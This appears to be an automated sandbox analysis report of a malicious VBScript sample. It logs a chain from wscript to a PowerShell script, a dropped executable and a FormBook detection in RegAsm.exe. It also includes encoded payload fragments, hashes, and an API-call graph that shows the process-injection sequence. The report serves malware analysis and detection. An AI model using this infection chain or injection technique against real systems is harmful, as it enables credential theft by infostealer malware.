                                                  2025-01-16 07:29:19 UTC16384INData Raw: 36 41 72 58 6f 65 66 52 71 33 64 63 51 45 43 6a 39 4d 6e 71 59 54 59 56 2b 56 4f 4d 67 6d 65 2b 4e 70 51 32 62 57 6a 2b 35 6c 77 31 63 47 68 57 57 6f 50 36 54 2b 68 43 37 6c 33 76 63 6d 34 32 73 61 49 58 36 2f 62 57 72 76 5a 6b 6f 55 34 4d 6f 47 46 61 57 76 46 4f 45 74 7a 58 79 6b 4b 6c 54 72 6b 6d 2f 4d 70 78 39 57 64 77 61 6a 76 36 55 71 38 75 59 55 48 4e 4d 33 37 4e 4c 67 68 46 61 2b 52 6d 71 52 65 6d 49 78 67 51 6e 79 31 42 49 44 5a 58 72 65 57 4f 68 75 35 65 63 48 41 78 30 54 66 50 44 4d 73 2b 30 66 34 4d 4b 34 58 75 6f 69 76 53 71 75 61 51 33 62 61 7a 65 64 68 32 31 4a 4f 32 51 6d 47 32 50 79 42 4e 58 36 6d 6b 55 70 4c 61 4b 54 55 4b 2f 55 62 55 56 4a 65 36 34 45 35 7a 6c 4d 4b 46 65 69 7a 75 5a 77 37 4f 44 5a 76 48 68 66 4a 46 2f 61 38 67 67 4c 42
                                                  Data Ascii: 6ArXoefRq3dcQECj9MnqYTYV+VOMgme+NpQ2bWj+5lw1cGhWWoP6T+hC7l3vcm42saIX6/bWrvZkoU4MoGFaWvFOEtzXykKlTrkm/Mpx9Wdwajv6Uq8uYUHNM37NLghFa+RmqRemIxgQny1BIDZXreWOhu5ecHAx0TfPDMs+0f4MK4XuoivSquaQ3bazedh21JO2QmG2PyBNX6mkUpLaKTUK/UbUVJe64E5zlMKFeizuZw7ODZvHhfJF/a8ggLB
                                                  2025-01-16 07:29:19 UTC16384INData Raw: 4c 58 68 76 75 59 62 6a 2b 44 43 34 34 4b 4a 42 41 53 55 63 4d 71 44 4e 7a 53 67 6f 4a 61 72 4e 4b 73 42 71 75 47 32 58 68 72 37 33 68 68 53 66 4c 6d 32 4a 69 68 38 48 45 2b 2b 78 38 51 58 53 39 6e 53 65 35 65 30 46 62 50 4b 75 38 46 74 59 38 74 68 69 36 6c 47 32 75 56 7a 68 6c 74 6f 59 6f 52 34 52 44 4a 71 71 6b 66 69 49 61 44 6a 6d 63 43 42 61 31 6a 51 67 74 49 4d 70 6a 6c 79 33 33 63 52 48 65 51 72 45 52 6a 55 77 73 44 6b 61 43 61 57 54 52 56 2f 65 58 63 6f 65 69 66 39 77 43 39 4f 46 48 30 62 63 6e 44 6a 56 6a 67 2f 66 7a 45 4e 62 64 45 32 74 52 32 32 6e 67 45 75 44 56 4b 51 73 52 37 4e 54 38 64 64 78 69 59 56 57 44 55 65 45 73 68 42 47 79 31 6d 4a 39 73 58 6c 4b 7a 4a 5a 52 64 42 77 6f 6f 62 33 45 53 50 59 73 52 4e 34 72 55 42 30 43 52 6b 7a 2b 59 59
                                                  Data Ascii: LXhvuYbj+DC44KJBASUcMqDNzSgoJarNKsBquG2Xhr73hhSfLm2Jih8HE++x8QXS9nSe5e0FbPKu8FtY8thi6lG2uVzhltoYoR4RDJqqkfiIaDjmcCBa1jQgtIMpjly33cRHeQrERjUwsDkaCaWTRV/eXcoeif9wC9OFH0bcnDjVjg/fzENbdE2tR22ngEuDVKQsR7NT8ddxiYVWDUeEshBGy1mJ9sXlKzJZRdBwoob3ESPYsRN4rUB0CRkz+YY
                                                  2025-01-16 07:29:19 UTC16384INData Raw: 4f 77 63 6f 50 6b 74 37 65 76 4e 55 66 35 78 69 41 67 6b 4f 37 6c 39 6a 43 52 51 7a 61 38 46 79 6f 54 41 55 36 74 66 36 6d 2b 4e 62 5a 32 36 51 65 6b 38 5a 6b 43 64 4b 74 5a 68 72 57 62 6a 66 6b 38 41 53 33 6d 71 64 42 69 30 71 56 35 57 52 37 65 4f 70 76 75 51 4e 6f 73 59 77 72 55 78 46 6b 6c 44 75 51 75 78 78 4b 76 79 51 5a 66 33 47 45 68 37 50 51 58 5a 30 6c 34 57 67 33 50 6f 61 45 6b 36 75 77 6c 69 4f 56 69 47 73 31 46 4e 61 6d 5a 49 4a 6b 43 6e 73 38 38 38 79 69 65 4d 6a 51 5a 78 76 68 56 6b 73 2b 2f 53 46 49 67 70 77 66 58 68 39 30 4b 68 4a 55 47 49 49 66 38 42 65 6f 41 4e 6d 57 58 6e 72 4a 31 38 6a 2b 53 67 34 56 43 42 73 56 37 63 50 67 4e 5a 49 53 36 51 47 4c 62 4f 57 62 78 30 73 71 62 4f 55 68 4c 7a 47 71 6c 51 76 66 59 68 37 47 62 31 6c 6a 37 44
                                                  Data Ascii: OwcoPkt7evNUf5xiAgkO7l9jCRQza8FyoTAU6tf6m+NbZ26Qek8ZkCdKtZhrWbjfk8AS3mqdBi0qV5WR7eOpvuQNosYwrUxFklDuQuxxKvyQZf3GEh7PQXZ0l4Wg3PoaEk6uwliOViGs1FNamZIJkCns888yieMjQZxvhVks+/SFIgpwfXh90KhJUGIIf8BeoANmWXnrJ18j+Sg4VCBsV7cPgNZIS6QGLbOWbx0sqbOUhLzGqlQvfYh7Gb1lj7D


                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  General

                                                  Target ID:1
                                                  Start time:02:29:15
                                                  Start date:16/01/2025
                                                  Path:C:\Windows\System32\wscript.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan file.Vbs.vbs"
                                                  Imagebase:0x7ff7ceb60000
                                                  File size:170'496 bytes
                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:3
                                                  Start time:02:29:19
                                                  Start date:16/01/2025
                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                                                  Imagebase:0x7ff6cb6b0000
                                                  File size:452'608 bytes
                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:4
                                                  Start time:02:29:19
                                                  Start date:16/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff6ee680000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  General

                                                  Target ID:5
                                                  Start time:02:29:21
                                                  Start date:16/01/2025
                                                  Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                  Imagebase:0xce0000
                                                  File size:338'432 bytes
                                                  MD5 hash:700263396E8D316FC5651BC5B4E456EC
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 100%, Avira
                                                  • Detection: 100%, Joe Sandbox ML
                                                  Reputation:low
                                                  Has exited:true

                                                  General

                                                  Target ID:6
                                                  Start time:02:29:21
                                                  Start date:16/01/2025
                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                  Imagebase:0xdd0000
                                                  File size:65'440 bytes
                                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1906683067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.1907541991.0000000002E00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                  Reputation:high
                                                  Has exited:true

                                                  Disassembly

                                                  Reset < >

                                                    Executed Functions

                                                    Function 00007FFB4ADC0061 Relevance: .8, Instructions: 793COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1559977870.00007FFB4ADC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffb4adc0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e7dbd6d9fe379100d5dd532243f0759b31679e76980083b34ad0a1d90879821a
                                                    • Instruction ID: 80bc2f7ca6cb2108bb289cbdbeae51e1676b2cab4f447a412aefcfa6d1571e70
                                                    • Opcode Fuzzy Hash: e7dbd6d9fe379100d5dd532243f0759b31679e76980083b34ad0a1d90879821a
                                                    • Instruction Fuzzy Hash: 173226A2A0EB890FF796AF7888552B47FE4EF56210F5901FBD04DCB193D9189C0AC791
                                                    Function 00007FFB4ADC06E0 Relevance: .5, Instructions: 510COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1559977870.00007FFB4ADC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffb4adc0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1716ec69402e836f7763e2954a2a2a165282c64a8307b256b889ea0ed9289a93
                                                    • Instruction ID: de2981b151cb067d0ed8bec4785ec42c0868443ec4b6d09f3ee6e29cd9c9caf0
                                                    • Opcode Fuzzy Hash: 1716ec69402e836f7763e2954a2a2a165282c64a8307b256b889ea0ed9289a93
                                                    • Instruction Fuzzy Hash: DAE145A2A0DB894FF79AAF3898552B47BE4EF46210B5801FBD489C71D3DD189C06C792
                                                    Function 00007FFB4ADC07F7 Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1559977870.00007FFB4ADC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffb4adc0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 02cdbf28127fcb193c2d7ff08f7ca12c8b346d7faf69b89f8190125ae880ead3
                                                    • Instruction ID: 73b4281372c9802101a47ce70fcf7cfb27a86884a9ecf17ca9625bb8d8cd62d1
                                                    • Opcode Fuzzy Hash: 02cdbf28127fcb193c2d7ff08f7ca12c8b346d7faf69b89f8190125ae880ead3
                                                    • Instruction Fuzzy Hash: 9D110DE2F1D9164BF6A9BE28E6561F852C5EF84310BE442F9D80DC39C6EE0C6E4141C2
                                                    Function 00007FFB4ACF37B5 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1557578476.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffb4acf0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                    • Instruction ID: 259deb8094cd4fdef2c58de92dd26017ae4a84a772c25544b7d62e04e74e86ee
                                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                    • Instruction Fuzzy Hash: 5E01677111CB0D8FD744EF0CE451AB6B7E0FB95364F10056EE58AC3691D636E882CB45
                                                    Function 00007FFB4ADC0552 Relevance: .0, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1559977870.00007FFB4ADC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffb4adc0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2adcc61562612dacc1089a346ebdd0af712b2a126212dd7b650f8f95587aac4c
                                                    • Instruction ID: 37e96bee62d65417b141066801deb6e4c12a66840506fd88113b12a09d503fbc
                                                    • Opcode Fuzzy Hash: 2adcc61562612dacc1089a346ebdd0af712b2a126212dd7b650f8f95587aac4c
                                                    • Instruction Fuzzy Hash: 60F08262F2DD2E0FF6A6AE6CA6453B452E5EF98620FD406F6D80DC3182DD189C124681

                                                    Non-executed Functions

                                                    Function 00007FFB4ACF102D Relevance: .3, Instructions: 303COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1557578476.00007FFB4ACF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ACF0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_7ffb4acf0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5cfdbd6832690e9224872f30bbe36f7fdeb1c527e106b36fab2e1552a696c5d2
                                                    • Instruction ID: b6967e0369ae931be8ebf9e1409cebf5713867a353e73b1d98d82c55d7699e70
                                                    • Opcode Fuzzy Hash: 5cfdbd6832690e9224872f30bbe36f7fdeb1c527e106b36fab2e1552a696c5d2
                                                    • Instruction Fuzzy Hash: 1AA1C19790E7D24FE753AF7C98A50D67F64EF1326471900F7C9C5CA4A3D908580AC3A2

                                                    Execution Graph

                                                    Execution Coverage:24.6%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:146
                                                    Total number of Limit Nodes:3
                                                    execution_graph 3767 1551bd1 3768 1551c25 VirtualProtect 3767->3768 3769 1551c91 3768->3769 3619 1555230 3621 1555254 3619->3621 3620 1555329 3621->3620 3624 1555e71 3621->3624 3639 1556130 3621->3639 3626 1555ead 3624->3626 3625 155617e 3625->3620 3626->3625 3654 1556270 3626->3654 3658 1556260 3626->3658 3662 1556858 3626->3662 3666 1556848 3626->3666 3670 1556aa0 3626->3670 3674 1556ab0 3626->3674 3678 1556c41 3626->3678 3682 1556c50 3626->3682 3686 1556e38 3626->3686 3692 1556e48 3626->3692 3698 1557228 3626->3698 3706 1557219 3626->3706 3641 1555efa 3639->3641 3640 155617e 3640->3620 3641->3640 3642 1556858 Wow64SetThreadContext 3641->3642 3643 1556848 Wow64SetThreadContext 3641->3643 3644 1556c41 VirtualAllocEx 3641->3644 3645 1556c50 VirtualAllocEx 3641->3645 3646 1557219 3 API calls 3641->3646 3647 1557228 3 API calls 3641->3647 3648 1556270 CreateProcessA 3641->3648 3649 1556260 CreateProcessA 3641->3649 3650 1556ab0 ReadProcessMemory 3641->3650 3651 1556aa0 ReadProcessMemory 3641->3651 3652 1556e48 WriteProcessMemory 3641->3652 3653 1556e38 WriteProcessMemory 3641->3653 3642->3641 3643->3641 3644->3641 3645->3641 3646->3641 3647->3641 3648->3641 3649->3641 3650->3641 3651->3641 3652->3641 3653->3641 3655 1556294 3654->3655 3714 155569c 3655->3714 3659 1556294 3658->3659 3660 155569c CreateProcessA 3659->3660 3661 155630e 3660->3661 3661->3626 3663 1556874 3662->3663 3665 15568f0 3663->3665 3718 15556b4 3663->3718 3665->3626 3667 1556874 3666->3667 3668 15556b4 Wow64SetThreadContext 3667->3668 3669 15568f0 3667->3669 3668->3669 3669->3626 3671 1556acd 3670->3671 3722 15556dc 3671->3722 3675 1556acd 3674->3675 3676 15556dc ReadProcessMemory 3675->3676 3677 1556af3 3676->3677 3677->3626 3679 1556c73 3678->3679 3726 15556f4 3679->3726 3681 1556cbb 3681->3626 3683 1556c73 3682->3683 3684 15556f4 VirtualAllocEx 3683->3684 3685 1556cbb 3684->3685 3685->3626 3691 1556e72 3686->3691 3687 155701b 3688 155570c WriteProcessMemory 3687->3688 3689 1557053 3688->3689 3689->3626 3691->3687 3730 155570c 3691->3730 3693 1556e72 3692->3693 3694 155701b 3693->3694 3697 155570c WriteProcessMemory 3693->3697 3695 155570c WriteProcessMemory 3694->3695 3696 1557053 3695->3696 3696->3626 3697->3693 3699 155724f 3698->3699 3700 155570c WriteProcessMemory 3699->3700 3701 15572bb 3700->3701 3704 155736f 3701->3704 3734 1555724 3701->3734 3738 155573c 3704->3738 3705 1557400 3705->3626 3707 155724f 3706->3707 3708 155570c WriteProcessMemory 3707->3708 3709 15572bb 3708->3709 3710 1555724 Wow64SetThreadContext 3709->3710 3713 155736f 3709->3713 3710->3713 3711 155573c ResumeThread 3712 1557400 3711->3712 3712->3626 3713->3711 3715 1556378 CreateProcessA 3714->3715 3717 15566b0 3715->3717 3717->3717 3719 1556990 Wow64SetThreadContext 3718->3719 3721 1556a53 3719->3721 3721->3665 3723 1556b20 ReadProcessMemory 3722->3723 3725 1556af3 3723->3725 3725->3626 3727 1556d28 VirtualAllocEx 3726->3727 3729 1556de6 3727->3729 3729->3681 3731 15570d0 WriteProcessMemory 3730->3731 3733 15571b7 3731->3733 3733->3691 3735 155572b Wow64SetThreadContext 3734->3735 3737 1556a53 3735->3737 3737->3704 3739 1555743 ResumeThread 3738->3739 3741 15574ff 3739->3741 3741->3705 3782 15556d0 3783 15556d5 3782->3783 3784 155572b Wow64SetThreadContext 3783->3784 3785 1556b20 ReadProcessMemory 3783->3785 3789 1556a53 3784->3789 3788 1556be6 3785->3788 3802 1555690 3803 1555695 CreateProcessA 3802->3803 3805 15566b0 3803->3805 3805->3805 3751 1556b19 3752 1556b70 ReadProcessMemory 3751->3752 3753 1556be6 3752->3753 3742 1551bd8 3743 1551c25 VirtualProtect 3742->3743 3744 1551c91 3743->3744 3754 1555718 3755 155571d 3754->3755 3756 1555773 3755->3756 3757 1556a0b Wow64SetThreadContext 3755->3757 3758 1556a53 3757->3758 3749 1557160 WriteProcessMemory 3750 15571b7 3749->3750 3759 1555700 3761 1555705 3759->3761 3760 155575b 3761->3760 3762 1557156 WriteProcessMemory 3761->3762 3763 15571b7 3762->3763 3764 1556d20 3765 1556d70 VirtualAllocEx 3764->3765 3766 1556de6 3765->3766 3777 1555220 3779 1555254 3777->3779 3778 1555329 3779->3778 3780 1555e71 7 API calls 3779->3780 3781 1556130 7 API calls 3779->3781 3780->3778 3781->3778 3770 1556989 3771 15569dd Wow64SetThreadContext 3770->3771 3773 1556a53 3771->3773 3774 1557468 3775 15574b5 ResumeThread 3774->3775 3776 15574ff 3775->3776 3790 15570c8 3791 15570cf WriteProcessMemory 3790->3791 3793 15571b7 3791->3793 3794 15556e8 3795 15556ed 3794->3795 3796 1555743 ResumeThread 3795->3796 3797 1556d28 VirtualAllocEx 3795->3797 3800 15574ff 3796->3800 3801 1556de6 3797->3801

                                                    Executed Functions

                                                    Function 015556D0 Relevance: 3.2, APIs: 2, Instructions: 207threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 01556A41
                                                    • ReadProcessMemory.KERNELBASE(00000004,?,01556AF3,?,?), ref: 01556BD4
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1537684400.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1550000_x.jbxd
                                                    Similarity
                                                    • API ID: ContextMemoryProcessReadThreadWow64
                                                    • String ID:
                                                    • API String ID: 1799759472-0
                                                    • Opcode ID: 0d03f61e31a0ec6aea9e68e4928ec8cfff63edddfee1915e21a436905467fafc
                                                    • Instruction ID: f5fc2061f891191a98d42745b8d67b171a19c446701bbfa2c9c65ea401d52232
                                                    • Opcode Fuzzy Hash: 0d03f61e31a0ec6aea9e68e4928ec8cfff63edddfee1915e21a436905467fafc
                                                    • Instruction Fuzzy Hash: 608199B5D05258DFDB10CFAAD984ADEFBF1BB49310F14902AE818BB210D774A945CF64
                                                    Function 015556E8 Relevance: 3.2, APIs: 2, Instructions: 180memorythreadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 20 15556e8-15556f1 22 1555743-15574fd ResumeThread 20->22 23 15556f3-15556fb 20->23 30 1557506-1557540 22->30 31 15574ff-1557505 22->31 23->22 24 1556d28-1556de4 VirtualAllocEx 23->24 27 1556de6-1556dec 24->27 28 1556ded-1556e2f 24->28 27->28 31->30
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01556DD4
                                                    • ResumeThread.KERNELBASE(00000000), ref: 015574ED
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1537684400.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1550000_x.jbxd
                                                    Similarity
                                                    • API ID: AllocResumeThreadVirtual
                                                    • String ID:
                                                    • API String ID: 234695336-0
                                                    • Opcode ID: fed79a013b97679d913319544e3fe4970b54c8fabc9c08ff55e94e0cf49903ea
                                                    • Instruction ID: 533260ad345ca87d4d6e9d221b8999ec9f71dbbe8dd88921db322fec173ca23d
                                                    • Opcode Fuzzy Hash: fed79a013b97679d913319544e3fe4970b54c8fabc9c08ff55e94e0cf49903ea
                                                    • Instruction Fuzzy Hash: 9C6186B9D012589FDB10CFA9D984A9EFBF4BB49310F10942AE818BB310D775A941CF68
                                                    Function 01555700 Relevance: 2.0, APIs: 1, Instructions: 528injectionCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 189 1555700-1555709 191 155575b-1555a72 189->191 192 155570b-1555713 189->192 193 1555a74 191->193 194 1555a79-1555aa6 191->194 192->191 195 15570d0-155713f 192->195 193->194 198 1557156-15571b5 WriteProcessMemory 195->198 199 1557141-1557153 195->199 201 15571b7-15571bd 198->201 202 15571be-1557208 198->202 199->198 201->202
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000), ref: 015571A5
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1537684400.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1550000_x.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: 5c4135aa056d1e2c54cadf58a0a2d7e2813507291a23e349f27cfeec7c7fbf16
                                                    • Instruction ID: 7e8622ce5f49f5202256ba902c4875d1bcab0cbe809b7585fcdf208e1def2c0c
                                                    • Opcode Fuzzy Hash: 5c4135aa056d1e2c54cadf58a0a2d7e2813507291a23e349f27cfeec7c7fbf16
                                                    • Instruction Fuzzy Hash: 0A51DDB9D043589FDB01CFA9D884ADDBBF1BB49310F14846AE818BB251D3749A45CF94
                                                    Function 01555718 Relevance: 2.0, APIs: 1, Instructions: 494threadCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 207 1555718-1555721 209 1555773-1555a72 207->209 210 1555723-15569f4 207->210 211 1555a74 209->211 212 1555a79-1555a81 209->212 218 15569f6-1556a08 210->218 219 1556a0b-1556a51 Wow64SetThreadContext 210->219 211->212 215 1555a83-1555a86 212->215 216 1555a91-1555aa6 215->216 218->219 221 1556a53-1556a59 219->221 222 1556a5a-1556a9e 219->222 221->222
                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 01556A41
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1537684400.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1550000_x.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: fb06cc65545f106e045444c1ad8d3ac70f82334baa3896d39ae92894060c803e
                                                    • Instruction ID: c0766e42f6fdfad2bc168a02168e9b56c3e6a80e3211030a9ce3ba103e4acf29
                                                    • Opcode Fuzzy Hash: fb06cc65545f106e045444c1ad8d3ac70f82334baa3896d39ae92894060c803e
                                                    • Instruction Fuzzy Hash: 3A510DB5D05348DFDB10CFAAD884ADDBBF0BB49310F10806AE814BB251E7746949CF95
                                                    Function 01555690 Relevance: 1.8, APIs: 1, Instructions: 345processCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 396 1555690-155641b 400 155647d-15564a8 396->400 401 155641d-155644d 396->401 404 155650a-1556563 400->404 405 15564aa-15564da 400->405 401->400 407 155644f-1556454 401->407 412 1556565-1556592 404->412 413 15565c2-15566ae CreateProcessA 404->413 405->404 417 15564dc-15564e1 405->417 410 1556477-155647a 407->410 411 1556456-1556460 407->411 410->400 414 1556464-1556473 411->414 415 1556462 411->415 412->413 428 1556594-1556599 412->428 436 15566b7-1556791 413->436 437 15566b0-15566b6 413->437 414->414 418 1556475 414->418 415->414 421 1556504-1556507 417->421 422 15564e3-15564ed 417->422 418->410 421->404 423 15564f1-1556500 422->423 424 15564ef 422->424 423->423 427 1556502 423->427 424->423 427->421 430 15565bc-15565bf 428->430 431 155659b-15565a5 428->431 430->413 432 15565a7 431->432 433 15565a9-15565b8 431->433 432->433 433->433 434 15565ba 433->434 434->430 448 15567a1-15567a5 436->448 449 1556793-1556797 436->449 437->436 451 15567b5-15567b9 448->451 452 15567a7-15567ab 448->452 449->448 450 1556799 449->450 450->448 454 15567c9-15567cd 451->454 455 15567bb-15567bf 451->455 452->451 453 15567ad 452->453 453->451 457 1556803-155680e 454->457 458 15567cf-15567f8 454->458 455->454 456 15567c1 455->456 456->454 462 155680f 457->462 458->457 462->462
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,03FA358C,03FA3590,0155630E,?,?,?,?,?), ref: 0155669B
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.1537684400.0000000001550000.00000040.00000800.00020000.00000000.sdmp, Offset: 01550000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1550000_x.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID:
                                                    • API String ID: 963392458-0
                                                    • Opcode ID: a802e4f5ec2557dca7558fd53280b141cdc87eab9a0482272894d64e8670b9f5
                                                    • Instruction ID: 1360c9af9f5ebd3407ab44cd9f7484d8945ebcc5ee5dc1948850771543354d95
                                                    • Opcode Fuzzy Hash: a802e4f5ec2557dca7558fd53280b141cdc87eab9a0482272894d64e8670b9f5
                                                    • Instruction Fuzzy Hash: 44D13A70D00259CFDB60CFA8D8907EDBBF1BF49304F0091AAD959AB250DB749A85CF95
                                                    Function 0155569C Relevance: 1.8, APIs: 1, Instructions: 341processCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 463 155569c-155641b 466 155647d-15564a8 463->466 467 155641d-155644d 463->467 470 155650a-1556563 466->470 471 15564aa-15564da 466->471 467->466 473 155644f-1556454 467->473 478 1556565-1556592 470->478 479 15565c2-15566ae CreateProcessA 470->479 471->470 483 15564dc-15564e1 471->483 476 1556477-155647a 473->476 477 1556456-1556460 473->477 476->466 480 1556464-1556473 477->480 481 1556462 477->481 478->479 494 1556594-1556599 478->494 502 15566b7-1556791 479->502 503 15566b0-15566b6 479->503 480->480 484 1556475 480->484 481->480 487 1556504-1556507 483->487 488 15564e3-15564ed 483->488 484->476 487->470 489 15564f1-1556500 488->489 490 15564ef 488->490 489->489 493 1556502 489->493 490->489 493->487 496 15565bc-15565bf 494->496 497 155659b-15565a5 494->497 496->479 498 15565a7 497->498 499 15565a9-15565b8 497->499 498->499 499->499 500 15565ba 499->500 500->496 514 15567a1-15567a5 502->514 515 1556793-1556797 502->515 503->502 517 15567b5-15567b9 514->517 518 15567a7-15567ab 514->518 515->514 516 1556799 515->516 516->514 520 15567c9-15567cd 517->520 521 15567bb-15567bf 517->521 518->517 519 15567ad 518->519 519->517 523 1556803-155680e 520->523 524 15567cf-15567f8 520->524 521->520 522 15567c1 521->522 522->520 528 155680f 523->528 524->523 528->528
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,03FA358C,03FA3590,0155630E,?,?,?,?,?), ref: 0155669B
                                                    Memory Dump Source
